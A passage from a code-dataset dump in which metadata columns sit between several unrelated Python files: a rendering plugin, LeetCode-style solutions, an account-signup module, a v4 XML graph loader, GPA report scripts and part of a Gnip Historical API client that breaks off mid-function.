seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
24846411098 | from typing import Optional
from dataclasses import dataclass
import numpy as np
from commonroad_geometric.rendering.base_renderer_plugin import BaseRendererPlugin
from commonroad_geometric.rendering.types import RenderParams
from commonroad_geometric.rendering.viewer.viewer_2d import Viewer2D
@dataclass
class RenderDrivableAreaStyle:
    """Style options for RenderDrivableAreaPlugin (currently none are defined)."""
class RenderDrivableAreaPlugin(BaseRendererPlugin):
    """Renders the drivable-area occupancy image of the ego vehicle,
    falling back to the first vehicle when no ego vehicle is present."""

    def __init__(
        self,
        style: Optional[RenderDrivableAreaStyle] = None,
        **kwargs
    ) -> None:
        # Build a style from loose keyword arguments when none is supplied.
        self.style = RenderDrivableAreaStyle(**kwargs) if style is None else style

    def __call__(
        self,
        viewer: Viewer2D,
        params: RenderParams
    ) -> None:
        data = params.data
        if params.ego_vehicle is not None:
            image = data.ego.drivable_area
            position = data.ego.pos
        else:
            # No ego vehicle: draw the drivable area of the first vehicle.
            image = data.v.drivable_area[0]
            position = data.v.pos[0]
        # Scale the binary mask to 0-255 grayscale before drawing.
        viewer.draw_rgb_image(data=255 * image, pos=position, scale=0.2)
| CommonRoad/crgeo | commonroad_geometric/rendering/plugins/render_drivable_area_plugin.py | render_drivable_area_plugin.py | py | 1,172 | python | en | code | 25 | github-code | 13 |
4568744558 | class Solution:
def myAtoi(self, str):
"""
:type str: str
:rtype: int
"""
import re
res = ''
tmp = re.findall('^[-+]?[\d]+', str.strip()) # 正则判断,非法字符串会返回空,返回的必是带有一个+/-或无符号的数字串
if tmp:
ms = tmp[0]
if ms[0] == "-" or ms[0] == "+":
res = ms[1:]
else:
res = ms
res = int(res)
if ms[0] == "-":
return max(-res, -0x80000000)
return min(res, 0x7FFFFFFF)
else:
return 0
def myAtoi2(self, str):
"""
:type str: str
:rtype: int
"""
numset = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'}
op = {"-", "+"}
if str == "" or str.isspace():
return 0
ms = str.lstrip()
low = 0
res = 0
while low < len(ms) and ms[low] in op: # 判断符号位是否正确
low += 1
if low > 1 or low == len(ms): return 0 # 只有符号没有数字,或者符号多于一个
while low < len(ms):
if ms[low] in numset:
res = res * 10 + int(ms[low])
else:
break
low += 1
if ms[0] == "-":
return max(-res, -0x80000000)
return min(res, 0x7FFFFFFF)
| Weikoi/OJ_Python | leetcode/medium/8_字符串转换成整数.py | 8_字符串转换成整数.py | py | 1,417 | python | en | code | 0 | github-code | 13 |
71594426898 | from backend.resources.database import DBClient
import hashlib, os
def signup_account(**kwargs):
    """Create a new account document from signup-form fields.

    Expects at least 'username', 'psw' and 'psw-repeat' in kwargs.
    Returns (True, '') on success or (False, reason) if the username is taken.
    """
    dbclient = DBClient()
    collection = dbclient.db.accounts
    try:
        # Probe for an existing account; when no document matches, get_array's
        # result cannot be subscripted and the lookup below raises.
        trytofind = dbclient.get_array(collection, {"username": kwargs['username']})
        trytofind['username']
        return False, "This username is already taken!"
    except Exception:
        # Narrowed from a bare "except:" so SystemExit/KeyboardInterrupt are
        # no longer silently swallowed during the existence probe.
        pass
    kwargs['premium'] = False
    kwargs['expiresIn'] = 0
    kwargs['salt'] = os.urandom(64)
    # The confirmation field must not be stored (raises KeyError if absent).
    kwargs.pop('psw-repeat')
    # Two-stage PBKDF2: derive a per-user salt digest keyed by the server-side
    # secret, then hash the password against that derived salt.
    salt = hashlib.pbkdf2_hmac('sha256', kwargs['salt'], os.environ['salt_key'].encode(), 5000).hex().encode()
    kwargs['psw'] = hashlib.pbkdf2_hmac('sha256', kwargs['psw'].encode(), salt, 20000).hex()
    dbclient.create_doc(collection, kwargs)
    return True, ''
def discord_signup(userid):
    """Ensure an account document exists for the given Discord user id.

    Returns (True, '') whether the account already existed or was just created.
    """
    dbclient = DBClient()
    collection = dbclient.db.accounts
    # Look for an existing Discord-linked account for this user id.
    existing = dbclient.get_array(collection, {'username': str(userid), 'discord_account': True})
    if existing:
        return True, ''
    # Not found: create a fresh non-premium Discord account document.
    data = {
        'username': str(userid),
        'discord_account': True,
        'premium': False,
        'expiresIn': 0,
    }
    dbclient.create_doc(collection, data)
return True, '' | Try2Win4Glory/Lacan-NTSport-Website | backend/signup/signup.py | signup.py | py | 1,185 | python | en | code | 1 | github-code | 13 |
3720568810 | import sys
# Longest strictly-increasing subsequence length via the O(n^2) DP recurrence.
INT_MIN = -sys.maxsize  # sentinel: "no valid subsequence ending here yet"
n = int(input())  # number of elements in the sequence
s = list(map(int,input().split()))  # the sequence itself
dp = [INT_MIN for _ in range(n+1)]  # dp[i]: best LIS length ending at a[i]
a = s[:]
# Shift to 1-based indexing with a sentinel 0 at a[0].
# NOTE(review): assumes all inputs are positive so 0 compares below them -- TODO confirm.
a.insert(0,0)
dp[0] = 0  # the empty prefix contributes length 0
for i in range(1,n+1):
    for j in range(i):
        if a[j] < a[i]:
            # Extend the best subsequence ending at a[j] with element a[i].
            dp[i] = max(dp[i],dp[j]+1)
print(max(dp)) | JaeEon-Ryu/Coding_test | LeeBrosCode/DP/5_조건에 맞게 선택적으로 전진하는 DP/1) 최대 증가 부분 수열.py | 1) 최대 증가 부분 수열.py | py | 282 | python | en | code | 1 | github-code | 13 |
27236290487 | from graph.core import *
import xml.etree.ElementTree as ET
from lxml import etree
v4_namespace_uri = "https://poets-project.org/schemas/virtual-graph-schema-v4"
from graph.load_xml_v3 import XMLSyntaxError, get_attrib, \
get_attrib_defaulted, get_attrib_optional, get_attrib_optional_bool, \
get_child_text
from graph.parse_v4_structs import parse_struct_def_string, parse_struct_init_string, convert_def_to_typed_data_spec
import re
import os
import sys
import json
from typing import *
ns={"p":v4_namespace_uri}
# Precalculate, as these are on inner loop for (DevI|ExtI) and EdgeI
_ns_DevI="{{{}}}DevI".format(ns["p"])
_ns_ExtI="{{{}}}ExtI".format(ns["p"])
_ns_EdgeI="{{{}}}EdgeI".format(ns["p"])
# Precalculate for parsing of the device types (DeviceType | ExternalType )
_ns_DeviceType="{{{}}}DeviceType".format(ns["p"])
_ns_ExternalType="{{{}}}ExternalType".format(ns["p"])
_ns_brackets="{"+v4_namespace_uri+"}"
def deNS(t):
    """Collapse the fully-qualified '{uri}' namespace prefix in tag *t* to the short 'p:' form."""
    return t.replace(_ns_brackets,"p:")
def load_struct_spec(parentElt, eltName):
    """Find child *eltName* under *parentElt* and parse its text as a typed struct spec.

    Raises XMLSyntaxError when the child element is missing.
    """
    n=parentElt.find(eltName, ns)
    if n==None:
        raise XMLSyntaxError(f"Missing struct spec node {eltName}", parentElt)
    src=n.text
    # Parse the v4 struct-definition syntax, then convert to a typed data spec.
    df=parse_struct_def_string(src)
    return convert_def_to_typed_data_spec(df)
def load_struct_instance(spec, elt, attr):
    """Parse attribute *attr* of *elt* as a v4 struct initialiser against *spec*.

    Returns the fully-expanded value, or None when the attribute is absent.
    """
    val=get_attrib_optional(elt, attr)
    if val==None:
        return None
    init=parse_struct_init_string(val)
    value=spec.convert_v4_init(init)
    # The converted value must refine the declared spec before expansion.
    assert(spec.is_refinement_compatible(value))
    return spec.expand(value)
def load_message_type(parent,mtElt):
    """Parse a MessageType element (id plus p:Message struct) into a MessageType.

    Re-raises XMLSyntaxError as-is; wraps any other failure in an
    XMLSyntaxError that names the offending message id.
    """
    id=get_attrib(mtElt,"id")
    try:
        message=load_struct_spec(mtElt, "p:Message")
        return MessageType(parent,id,message,)
    except XMLSyntaxError:
        raise
    except Exception as e:
        raise XMLSyntaxError("Error while parsing message type {}".format(id),mtElt,e)
def load_external_type(graph,dtNode,sourceFile):
    """Parse an ExternalType element into a DeviceType flagged as external.

    External devices carry properties only: no state, no shared code and no
    handler bodies; their pins are bare message endpoints.
    """
    id=get_attrib(dtNode,"id")
    state=None  # externals never have a state struct
    properties=load_struct_spec(dtNode, "p:Properties")
    shared_code=[]
    metadata=None
    documentation=None
    # Positional True after shared_code marks this DeviceType as external.
    dt=DeviceType(graph,id,properties,state,metadata,shared_code, True, documentation)
    for p in dtNode.findall("p:InputPin", ns):
        name=get_attrib(p,"name")
        message_type_id=get_attrib(p,"messageTypeId")
        if message_type_id not in graph.message_types:
            raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
        message_type=graph.message_types[message_type_id]
        state=None # pins of ExternalType cannot have any state, properties, or handlers
        properties=None
        handler=''
        is_application=False # Legacy: must be false, eventually will be removed
        sourceLine=0
        pinMetadata=None
        dt.add_input(name,message_type,is_application,properties,state,pinMetadata, handler,sourceFile,sourceLine)
        sys.stderr.write(" Added external input {}\n".format(name))
    for p in dtNode.findall("p:OutputPin", ns):
        name=get_attrib(p,"name")
        message_type_id=get_attrib(p,"messageTypeId")
        if message_type_id not in graph.message_types:
            raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
        message_type=graph.message_types[message_type_id]
        is_application=False # Legacy: must be false, eventually will be removed
        handler=''
        sourceLine=0
        pinMetadata=None
        dt.add_output(name,message_type,is_application,pinMetadata,handler,sourceFile,sourceLine)
        sys.stderr.write(" Added external output {}\n".format(name))
    # Externals have no ready-to-send logic; install empty placeholders.
    dt.ready_to_send_handler=''
    dt.ready_to_send_source_line=0
    dt.ready_to_send_source_file=None
    return dt
def load_device_type(graph,dtNode,sourceFile):
    """Parse a DeviceType element: property/state structs, pins and all handlers.

    sourceFile is recorded against every handler for diagnostics.
    """
    id=get_attrib(dtNode,"id")
    properties=load_struct_spec(dtNode, "p:Properties")
    state=load_struct_spec(dtNode, "p:State")
    shared_code=[]
    # get_child_text returns (text, source_line); only the text matters here.
    tt=get_child_text(dtNode, "p:SharedCode", ns)[0]
    if tt is not None:
        shared_code.append(tt)
    metadata=None
    documentation=None
    dt=DeviceType(graph,id,properties,state,metadata,shared_code,isExternal=False,documentation=documentation)
    for p in dtNode.findall("p:InputPin",ns):
        name=get_attrib(p,"name")
        message_type_id=get_attrib(p,"messageTypeId")
        if message_type_id not in graph.message_types:
            raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
        message_type=graph.message_types[message_type_id]
        # NOTE: application pin support needed for as long as 2to3 is relevant.
        is_application=get_attrib_optional_bool(p,"application") # TODO: REMOVE APPLICATION PIN
        properties=load_struct_spec(p, "p:Properties")
        state=load_struct_spec(p, "p:State")
        pinMetadata=None
        documentation=None
        (handler,sourceLine)=get_child_text(p,"p:OnReceive",ns)
        dt.add_input(name,message_type,is_application,properties,state,pinMetadata, handler,sourceFile,sourceLine,documentation)
        #sys.stderr.write("  Added input {}\n".format(name))
    for p in dtNode.findall("p:OutputPin",ns):
        name=get_attrib(p,"name")
        message_type_id=get_attrib(p,"messageTypeId")
        if message_type_id not in graph.message_types:
            raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
        is_application=False
        # Indexed outputs select a destination by send index at runtime.
        is_indexed=get_attrib_optional_bool(p,"indexed")
        message_type=graph.message_types[message_type_id]
        pinMetadata=None
        (handler,sourceLine)=get_child_text(p,"p:OnSend",ns)
        documentation = None
        dt.add_output(name,message_type,is_application,pinMetadata,handler,sourceFile,sourceLine,documentation,is_indexed)
        #sys.stderr.write("  Added input {}\n".format(name))
    # Device-level handlers: each get_child_text call yields (text, line).
    (handler,sourceLine)=get_child_text(dtNode,"p:ReadyToSend",ns)
    dt.ready_to_send_handler=handler
    dt.ready_to_send_source_line=sourceLine
    dt.ready_to_send_source_file=sourceFile
    (handler,sourceLine)=get_child_text(dtNode,"p:OnInit", ns)
    dt.init_handler=handler
    dt.init_source_line=sourceLine
    dt.init_source_file=sourceFile
    (handler,sourceLine)=get_child_text(dtNode,"p:OnHardwareIdle",ns)
    dt.on_hardware_idle_handler=handler
    dt.on_hardware_idle_source_line=sourceLine
    dt.on_hardware_idle_source_file=sourceFile
    (handler,sourceLine)=get_child_text(dtNode,"p:OnDeviceIdle",ns)
    dt.on_device_idle_handler=handler
    dt.on_device_idle_source_line=sourceLine
    dt.on_device_idle_source_file=sourceFile
    return dt
def load_graph_type(graphNode, sourcePath):
    """Parse a GraphType element: properties, shared code, message types and
    device/external types, in that order (device types reference message types)."""
    # Fully-qualified tag names used to discriminate DeviceType vs ExternalType.
    deviceTypeTag = "{{{}}}DeviceType".format(ns["p"])
    externalTypeTag = "{{{}}}ExternalType".format(ns["p"])
    id=get_attrib(graphNode,"id")
    sys.stderr.write(" Loading graph type {}\n".format(id))
    properties=load_struct_spec(graphNode, "p:Properties")
    metadata=None
    documentation=None
    shared_code=[]
    # get_child_text returns (text, source_line); only the text is used here.
    tt=get_child_text(graphNode, "p:SharedCode", ns)[0]
    if tt is not None:
        shared_code.append(tt)
    graphType=GraphType(id,properties,metadata,shared_code,documentation)
    # Message types first, so pin declarations below can resolve them.
    for etNode in graphNode.findall("p:MessageTypes/p:*",ns):
        et=load_message_type(graphType,etNode)
        graphType.add_message_type(et)
    for dtNode in graphNode.findall("p:DeviceTypes/p:*",ns):
        if dtNode.tag == deviceTypeTag:
            dt=load_device_type(graphType, dtNode, sourcePath)
            graphType.add_device_type(dt)
            #sys.stderr.write("  Added device type {}\n".format(dt.id))
        elif dtNode.tag == externalTypeTag:
            et=load_external_type(graphType,dtNode,sourcePath)
            graphType.add_device_type(et)
            #sys.stderr.write("  Added external device type {}\n".format(et.id))
        else:
            raise RuntimeError(f"Unknown or unsupported element in DeviceTypes: {dtNode.tag}")
    return graphType
def load_external_instance(graph, eiNode):
    """Parse an ExtI element into a DeviceInstance of an external device type.

    Raises XMLSyntaxError when the referenced external type is unknown.
    """
    id=get_attrib(eiNode,"id")
    external_type_id=get_attrib(eiNode,"type")
    if external_type_id not in graph.graph_type.device_types:
        # BUG FIX: formatting this message previously crashed with
        # AttributeError -- it read '.di' on the string keys of the
        # misspelled 'deivce_types'. List the known type ids directly.
        raise XMLSyntaxError("Unknown external type id {}, known devices = [{}]".format(external_type_id, list(graph.graph_type.device_types.keys())), eiNode)
    external_type=graph.graph_type.device_types[external_type_id]
    properties=load_struct_instance(external_type.properties, eiNode, "P")
    metadata=None
    return DeviceInstance(graph,id,external_type,properties,metadata)
def load_device_instance(graph,diNode):
    """Parse a DevI element into a DeviceInstance of a regular device type.

    Raises XMLSyntaxError when the referenced device type is unknown.
    """
    id=get_attrib(diNode,"id")
    device_type_id=get_attrib(diNode,"type")
    if device_type_id not in graph.graph_type.device_types:
        # BUG FIX: device_types keys are id strings, so the original
        # '[d.id for d in ...keys()]' raised AttributeError while building
        # this very error message. List the ids directly instead.
        raise XMLSyntaxError("Unknown device type id {}, known devices = [{}]".format(device_type_id,
                list(graph.graph_type.device_types.keys())
            ),
            diNode
        )
    device_type=graph.graph_type.device_types[device_type_id]
    properties=load_struct_instance(device_type.properties, diNode, "P")
    # The "S" attribute is parsed for validation but deliberately discarded
    # below -- NOTE(review): confirm whether instance state should be honoured.
    state=load_struct_instance(device_type.state, diNode, "S")
    state=None
    metadata=None
    return DeviceInstance(graph,id,device_type,properties,state,metadata)
_split_path_re=re.compile("^([^:]+):([^-]+)-([^:]+):([^-]+)$")
def load_edge_instance(graph,eiNode):
    """Parse an EdgeI element; its path attribute is 'dstDev:dstPin-srcDev:srcPin'."""
    path=eiNode.attrib["path"]
    # _split_path_re captures (dst_device, dst_pin, src_device, src_pin).
    (dst_device_id,dst_pin_name,src_device_id,src_pin_name)=_split_path_re.match(path).groups()
    send_index=eiNode.attrib.get("sendIndex")
    dst_device=graph.device_instances[dst_device_id]
    src_device=graph.device_instances[src_device_id]
    assert dst_pin_name in dst_device.device_type.inputs, "Couldn't find input pin called '{}' in device type '{}'. Inputs are [{}]".format(dst_pin_name,dst_device.device_type.id, [p for p in dst_device.device_type.inputs])
    assert src_pin_name in src_device.device_type.outputs
    # Edge properties and state are typed by the destination input pin.
    dst_pin_type=dst_device.device_type.inputs[dst_pin_name]
    properties=load_struct_instance(dst_pin_type.properties, eiNode, "P")
    state=load_struct_instance(dst_pin_type.state, eiNode, "S")
    metadata=None
    return EdgeInstance(graph,dst_device,dst_pin_name,src_device,src_pin_name,properties,metadata, send_index, state=state)
def load_graph_instance(graphTypes, graphNode):
    """Parse a GraphInstance element: graph properties, then all device and
    external instances, then all edge instances."""
    # Fully-qualified tags for the three instance element kinds.
    devITag = "{{{}}}DevI".format(ns["p"])
    extITag = "{{{}}}ExtI".format(ns["p"])
    edgeITag = "{{{}}}EdgeI".format(ns["p"])
    id=get_attrib(graphNode,"id")
    graphTypeId=get_attrib(graphNode,"graphTypeId")
    graphType=graphTypes[graphTypeId]
    properties=load_struct_instance(graphType.properties, graphNode, "P")
    metadata=None # TODO: Load metadata
    documentation=None
    graph=GraphInstance(id,graphType,properties,metadata, documentation)
    # Exactly one DeviceInstances container is expected.
    disNode=graphNode.findall("p:DeviceInstances",ns)
    assert(len(disNode)==1)
    for diNode in disNode[0]:
        assert (diNode.tag==devITag) or (diNode.tag==extITag)
        if diNode.tag==devITag:
            di=load_device_instance(graph,diNode)
            graph.add_device_instance(di)
        elif diNode.tag==extITag:
            ei=load_external_instance(graph,diNode)
            graph.add_device_instance(ei)
    # Exactly one EdgeInstances container is expected.
    eisNode=graphNode.findall("p:EdgeInstances",ns)
    assert(len(eisNode)==1)
    for eiNode in eisNode[0]:
        assert eiNode.tag==edgeITag
        ei=load_edge_instance(graph,eiNode)
        graph.add_edge_instance(ei)
    return graph
def v4_load_graph_types_and_instances(doc : etree.Element , basePath:str) -> Tuple[GraphType, Optional[GraphInstance]]:
    """Load the single GraphType (and at most one GraphInstance) from a v4 document.

    doc: root element of the parsed v4 XML document.
    basePath: source path recorded against handlers for diagnostics.
    Returns (graphType, graphInstance-or-None); the XMLSyntaxError is logged
    (with the offending XML fragment) and re-raised on malformed input.
    """
    # FIX: the return annotation was a tuple literal '(GraphType, ...)', which
    # is not a valid type expression; use typing.Tuple (available via the
    # module's 'from typing import *').
    graphsNode = doc
    graphType=None
    graphInst=None
    try:
        for gtNode in graphsNode.findall("p:GraphType",ns):
            sys.stderr.write("Loading graph type\n")
            assert graphType is None  # at most one GraphType per document
            graphType=load_graph_type(gtNode, basePath)
        assert graphType, "No GraphType element."
        graphTypes={graphType.id : graphType}
        for giNode in graphsNode.findall("p:GraphInstance",ns):
            sys.stderr.write("Loading graph instance\n")
            assert graphInst is None  # at most one GraphInstance per document
            graphInst=load_graph_instance(graphTypes, giNode)
        return (graphType,graphInst)
    except XMLSyntaxError as e:
        # Log the message and the offending XML fragment before propagating.
        sys.stderr.write(str(e)+"\n")
        if e.node is not None:
            sys.stderr.write(etree.tostring(e.node, pretty_print = True, encoding='utf-8').decode("utf-8")+"\n")
        raise e
| joshjennings98/fyp | graph_schema-4.2.0/apps/clocked_izhikevich/graph/load_xml_v4.py | load_xml_v4.py | py | 12,485 | python | en | code | 0 | github-code | 13 |
34294237065 | from infoReadin import *
from configReadin import *
import joblib
import os
# --- Module initialisation: load config, course requirements and raw data ---
config = get_config()
conf_dir = config["config_dir"]
# Per-major required-course lists for postgraduate recommendation (保研).
baoy_files = {"化学":read_lesson_dem(conf_dir+"保研化学.txt"),
              "应用化学":read_lesson_dem(conf_dir+"保研应化.txt"),
              "应用化学(化学生物学)":read_lesson_dem(conf_dir+"保研化生.txt")}
data_path = config["rawdata_dir"]+config["filename"]
assert config["task_idx"] in "01234"  # tasks A-E are indexed 0-4
task_id = int(config["task_idx"])
basename = config["filename"].split(".")[0]
cache_path = config["cache_dir"]+f"{basename}.joblib"
# Reuse the parsed joblib cache when enabled; otherwise parse and refresh it.
if os.path.isfile(cache_path) and config["use_cache"]=="1":
    all_dict = joblib.load(cache_path)
else:
    all_dict = readin(data_path,config)
    joblib.dump(all_dict, cache_path)
def output_single(filename,record,mod=None):
    """Write one student's per-course detail CSV.

    record: mapping course-name -> course object (.credit/.score/.Gcredit/.cregra).
    mod: optional mapping course-name -> required credit; when given, rows follow
    the requirement list and missing courses get empty result columns.
    """
    # NOTE(review): the "ANSI" codec alias is Windows-only -- confirm target platform.
    with open(filename,"w",encoding="ANSI") as f:
        f.write("课程,学分,成绩,绩点,学分绩\n")
        rec_list = mod if mod else record.keys()
        for item in rec_list:
            temp = record.get(item)  # None when a required course was not taken
            credit = str(mod[item]) if mod!=None else record[item].credit
            Gcredit = record[item].Gcredit if temp!=None else None
            cregra = record[item].cregra if temp!=None else None
            score = record[item].score if temp!=None else None
            f.write(f"{item},{credit},{score},{Gcredit},{cregra}\n")
def output_baoy(filename,res_dict):
    """Write the 保研 (postgrad recommendation) summary CSV plus one per-student CSV.

    res_dict: id -> [name, major, (gpa, course_record_list)].
    """
    # Truncate the file first so the append mode below starts from empty.
    f = open(filename,"w")
    f.close()
    with open(filename,"a",encoding="ANSI") as f:
        f.write("学号,姓名,专业,保研绩点,备注\n")
        for item in res_dict:
            id = item
            name = res_dict[id][0]
            major = res_dict[id][1]
            temp = res_dict[id][2]
            res = temp[0]      # the computed GPA
            record = temp[1]   # course records actually counted
            num_aqu = len(baoy_files[major])
            # Flag students with fewer taken courses than required in the remarks.
            note = f"应修{num_aqu};实修{len(record)}" if len(record)<num_aqu else ""
            output_single(f"personal/{name}.csv",{i.name:i for i in record},
                mod=baoy_files[major])
            f.write(f"{id},{name},{major},{res},{note}\n")
    return
def output_ADE(filename,res_dict):
    """Write the summary CSV shared by tasks A/D/E plus one per-student detail CSV.

    res_dict: id -> [name, major, (gpa, course_record_list)].
    """
    # Truncate the file first so the append mode below starts from empty.
    f = open(filename,"w")
    f.close()
    with open(filename,"a",encoding="ANSI") as f:
        f.write("学号,姓名,专业,GPA\n")
        for item in res_dict:
            id = item
            name = res_dict[id][0]
            major = res_dict[id][1]
            temp = res_dict[id][2]
            res = temp[0]      # the computed GPA
            record = temp[1]   # course records actually counted
            output_single(f"personal/{name}.csv",{i.name:i for i in record})
            f.write(f"{id},{name},{major},{res}\n")
    return
def output_C(filename,res_dict):
    """Write the wide-format task-C CSV (one column per result key); returns res_dict.

    res_dict: id -> [name, major, {column_name: value}].
    """
    # Truncate the file first so the append mode below starts from empty.
    f = open(filename,"w")
    f.close()
    with open(filename,"a",encoding="ANSI") as f:
        # Derive the column header from the first student's result keys
        # (assumes every student shares the same key set).
        temp0 = list(res_dict.values())[0][2]
        temp1 = [key for key in temp0]
        title = "学号,姓名,专业,"+",".join(temp1)
        f.write(title+"\n")
        for item in res_dict:
            id = item
            name = res_dict[id][0]
            major = res_dict[id][1]
            message = f"{id},{name},{major},"
            temp2 = [str(res_dict[id][2][key]) for key in res_dict[id][2]]
            message = message+",".join(temp2)+"\n"
            f.write(message)
    return res_dict
def taskB(filename="result.csv"):
    """Task B: postgrad-recommendation GPA (mode 1) restricted to each major's required courses."""
    res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(
        1,demand=baoy_files[all_dict[i].major],
        A_lis=config["B_Aclass"])] for i in all_dict}
    output_baoy(filename,res_dict)
def taskA(filename="result.csv"):
    """Task A: plain GPA (mode 0) for every student; writes summary plus per-student files."""
    res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(0)] for i in all_dict}
    output_ADE(filename,res_dict)
def taskE(filename="result.csv"):
    """Task E: GPA in calculation mode 4 for every student; same output format as task A."""
    res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(4)] for i in all_dict}
    output_ADE(filename,res_dict)
def taskD(filename="result.csv"):
    """Task D: GPA (mode 3) limited to the configured D_only course set."""
    res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(
        3,demand=config["D_only"],
        A_lis=config["D_Aclass"])] for i in all_dict}
    output_ADE(filename,res_dict)
def taskC(filename="result.csv"):
    """Task C: per-category results (mode 2) driven by the C_* config entries; returns the result dict."""
    # Order matters: calculate() unpacks these config values positionally.
    demand_list = ["C_condition_line","C_zx_line","C_condition_keybm","C_condition_keyxz",
        "C_condition_keyname","C_zb_line","C_zb_name"]
    res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(
        2,demand=[config[j] for j in demand_list],major=all_dict[i].major)] for i in all_dict}
    return output_C(filename,res_dict)
| Jingdan-Chen/WGA | task.py | task.py | py | 4,519 | python | en | code | 0 | github-code | 13 |
15937278946 | # Python program to read
# file word by word
# opening the text file
# Split dump.txt into comma-separated tokens, then write one token per line.
attributes = []
with open('dump.txt','r') as file:
    # reading each line
    for line in file:
        # reading each comma-separated token of the line
        for word in line.split(","):
            # collect the token for the output pass below
            attributes.append(word)
# NOTE(review): the last token of each line keeps its trailing "\n", so the
# output may contain doubled newlines -- confirm this is intended.
with open('winrar_data.txt','w') as file1:
    for i in attributes:
        file1.write(i+"\n")
| Abhishek-yd/Malware-Dectection-Software-Powered-by-Machine-Learning | attributes.py | attributes.py | py | 391 | python | en | code | 1 | github-code | 13 |
16605770841 | #!/usr/bin/env python
import requests
import json
import sys
import datetime
from .gnip_historical_job import *
class DataSetResults(object):
    """Listing of a finished job's downloadable data files.

    Accepts both camelCase and snake_case server payload keys; missing
    counts default to -1 ("unknown") and missing URL lists to [].
    """
    def __init__(self, resDict):
        #print(resDict.keys())
        if "urlList" in resDict:
            self.dataURLs = resDict["urlList"]
        elif "url_list" in resDict:
            self.dataURLs = resDict["url_list"]
        else:
            self.dataURLs = []
        if "urlCount" in resDict:
            self.URLCount = int(resDict["urlCount"])
        elif "url_count" in resDict:
            self.URLCount = int(resDict["url_count"])
        else:
            self.URLCount = -1
        if "totalFileSizeBytes" in resDict:
            self.fileSizeBytes = int(resDict["totalFileSizeBytes"])
        elif "total_file_size_bytes" in resDict:
            self.fileSizeBytes = int(resDict["total_file_size_bytes"])
        else:
            self.fileSizeBytes = -1
        # NOTE(review): key "susptectMinuteURL" looks misspelled -- confirm
        # against the live server payload before renaming it.
        if "susptectMinuteURL" in resDict:
            self.suspectMinuteURLs = resDict["susptectMinuteURL"]
        else:
            self.suspectMinuteURLs = []
    def write(self):
        """Write the URL lists to ./data_files.txt (and ./suspect_files.txt if any)."""
        # BUG FIX: these files were opened in binary mode ("wb") while writing
        # str data, which raises TypeError on Python 3; open in text mode.
        with open("./data_files.txt", "w") as f:
            for i in self.dataURLs:
                f.write("%s\n"%i)
        if self.suspectMinuteURLs != []:
            with open("./suspect_files.txt", "w") as f:
                for i in self.suspectMinuteURLs:
                    f.write("%s\n"%i)
    def __repr__(self):
        res = 'DATA SET:\n'
        res += ' No. of URLs ............. {0:,}\n'.format(self.URLCount)
        res += ' File size (bytes)........ {0:,}\n'.format(self.fileSizeBytes)
        # Show at most the first five URLs, then an ellipsis marker.
        if len(self.dataURLs) > 5:
            tmpList = self.dataURLs[:5] + ["..."]
        else:
            tmpList = self.dataURLs
        tmpStr = str('\n'.join(tmpList))
        res += ' Files (URLs) ............ %s\n'%(tmpStr)
        if len(self.suspectMinuteURLs) > 5:
            tmpList = self.suspectMinuteURLs[:5] + ["..."]
        else:
            tmpList = self.suspectMinuteURLs
        tmpStr = str('\n'.join(tmpList))
        if len(self.suspectMinuteURLs) > 0:
            res += ' Suspect (URLs) .......... %s\n'%(tmpStr)
        return res
#
#
#
class Result(object):
    """Summary of a completed job's results; resolves the data URL into a
    DataSetResults via the owning GnipHistorical client."""
    def __init__(self, resDict, gnipHist):
        #print(str(resDict))
        # DATE_RE / DATEFMT come from gnip_historical_job (star import above).
        self.completedAt = datetime.datetime.strptime(DATE_RE.search(resDict["completedAt"]).group(0),DATEFMT)
        try:
            self.activityCount = int(resDict["activityCount"])
        except TypeError:
            # Server may send null; -1 is the "unknown" sentinel throughout.
            self.activityCount = -1
        try:
            self.fileCount = int(resDict["fileCount"])
        except TypeError:
            self.fileCount = -1
        try:
            self.fileSize = float(resDict["fileSizeMb"])
        except TypeError:
            self.fileSize = -1
        #self.dataFileURL = repairStagingURLs(resDict["dataURL"])
        self.dataFileURL = resDict["dataURL"]
        self.gnipHist = gnipHist
        self.dataSetResult = None
        # Eagerly resolve the data-file listing on construction.
        self.getDataSetResult()
    def getDataSetResult(self):
        # Fetch and wrap the data-file listing if the job exposed a data URL.
        if self.dataFileURL is not None:
            dataDict = self.gnipHist.getDataURLDict(self.dataFileURL)
            if dataDict is not None:
                self.dataSetResult = DataSetResults(dataDict)
    def write(self):
        # Delegate file writing to the wrapped data set, when present.
        if self.dataSetResult is not None:
            self.dataSetResult.write()
    def __repr__(self):
        res = 'RESULT:\n'
        res += ' Job completed at ........ %s\n'%(self.completedAt)
        res += ' No. of Activities ....... {0:,}\n'.format(self.activityCount)
        res += ' No. of Files ............ {0:,}\n'.format(self.fileCount)
        res += ' Files size (MB) ......... {0:,}\n'.format(self.fileSize)
        res += ' Data URL ................ %s\n'%(self.dataFileURL)
        if self.dataSetResult is not None:
            res += str(self.dataSetResult)
        return res
#
#
#
class Quote(object):
    """Cost and size estimate attached to a quoted Historical job."""

    def __init__(self, quoteDict):
        # print(str(quoteDict))
        # Cost may be absent or null; both map to the -1 "unknown" sentinel.
        if "costDollars" in quoteDict:
            try:
                self.costDollars = float(quoteDict["costDollars"])
            except TypeError:
                self.costDollars = -1
        else:
            self.costDollars = -1
        self.estimatedActivityCount = int(quoteDict["estimatedActivityCount"])
        self.estimatedDurationHours = float(quoteDict["estimatedDurationHours"])
        self.estimatedFileSizeMb = float(quoteDict["estimatedFileSizeMb"])
        # Missing or null expiry both render as "N/A".
        expires = quoteDict.get("expiresAt")
        if expires is None:
            self.expiresAt = "N/A"
        else:
